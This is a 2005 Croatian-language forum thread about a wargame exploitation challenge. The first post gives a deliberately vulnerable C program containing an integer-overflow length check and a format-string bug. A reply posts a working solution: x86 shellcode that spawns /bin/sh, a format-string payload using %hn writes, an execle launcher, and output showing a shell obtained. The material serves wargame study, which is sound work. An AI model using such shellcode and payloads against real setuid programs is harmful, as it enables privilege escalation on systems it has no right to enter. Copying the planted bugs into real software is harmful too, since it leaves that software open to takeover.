[es] - Zadatak za exploitanje 4

DownBload

Član broj: 1333
Poruke: 310
*.net.t-com.hr.

Profil

^{29.03.2005. u 17:16 - pre 232 meseci}

Evo jedan vise-manje jednostavan izazov za exploitanje koji sam daaaaavno prije napisao za II-Labs wargame server koji je vec duuugo offline.

Code:

#include <stdio.h>

void stupidone (unsigned short c, char *buf)
{
char name[56];
char frmths[200];
strncpy (frmths,buf,c);
snprintf (frmths,56,name);
printf ("%s",frmths);
}

main (int argc, char **argv)
{
char buffer[256];
int a, b, c;
char buf[16];

system ("/usr/bin/clear");

printf ("########################\n");
printf ("# W4rCr0-21 - LEVEL XX #\n");
printf ("########################\n");
printf ("- I'm quiet.\n\n");

printf ("> This program can compute 31337^999999999999999999999999 in 1/1000000000 nano sec. :-)\n");

printf ("\n> Project name: ");
fgets (buffer,sizeof(buffer),stdin);

printf ("\n> Give me first number: ");
fgets (buf,sizeof(buf),stdin);
a = atoi (buf);

if (a < 0)
{
   printf ("\n> ERROR: First number is negative!!!!\n");
   exit(0);
}
a += 16;

printf ("\n> Give me second number: ");
fgets (buf,sizeof(buf),stdin);
b = atoi (buf);

if (b < 0)
{
   printf ("\n> ERROR: Second number is negative!!!\n");
   exit(0);
}
b += 16;

c = a * b;

if (c >= 256 || c <= 0)
{
   printf ("\n> ERROR: %d * %d = %d - this is too easy for me!!!\n",a,b,c);
   exit (0);
}
else printf ("\n> %d * %d = %d \n", a, b, c);

printf ("\n");
stupidone(c,buffer);
}

Leon Juranic

Odgovor na temu

glupi

Član broj: 836
Poruke: 199
*.cmu.carnet.hr.

Profil

Re: Zadatak za exploitanje 4

^{22.04.2005. u 21:32 - pre 231 meseci}

Malo sam modificirao vuln program da umjesto fgetsa strncpy-a argument, jer je onda lakse i nemoram se zezat sa popenom.

Code:

[hazard@localhost 4]$ gcc ex.c -o ex; ./ex
bfffff81
########################
# W4rCr0-21 - LEVEL XX #
########################

> 19 * 1130254565 = 255
name: PP%x%49127u%hn%16268u%hn
frmt: PP40016601
sh-2.05b$

Code:

#include <stdio.h>
#include <unistd.h>

char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\xb0\xa4\x31\xdb\x31\xc9\x31\xd2\xcd\x80\xeb\x1a\x5e"
        "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42"
        "\x42";

int main()
{

        char *env[3] = {shellcode, NULL};
        char buf[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP\x8e\x99\x04\x08\x12\x12\x12\x12\x8c\x99\x04\x08%x%49127u%hn%16268u%hn";
        char  arg1[]="3", arg2[]="1130254549";

        printf("%x\n",0xbffffffa- strlen(shellcode) - strlen("/home/hazard/develop/games/downchallen/4/vuln"));

        execle("/home/hazard/develop/games/downchallen/4/vuln","vuln",buf, arg1, arg2, NULL, env);
        return 0;
}

Jel postoji neka metoda osim popena da prosljedjujem parametre programu, jer preko popena mogu samo citat ili pisat po pipeu sto ogranicava nadgledanje toka programa?
Jel jos neko rijesio i na koji nacin?

Odgovor na temu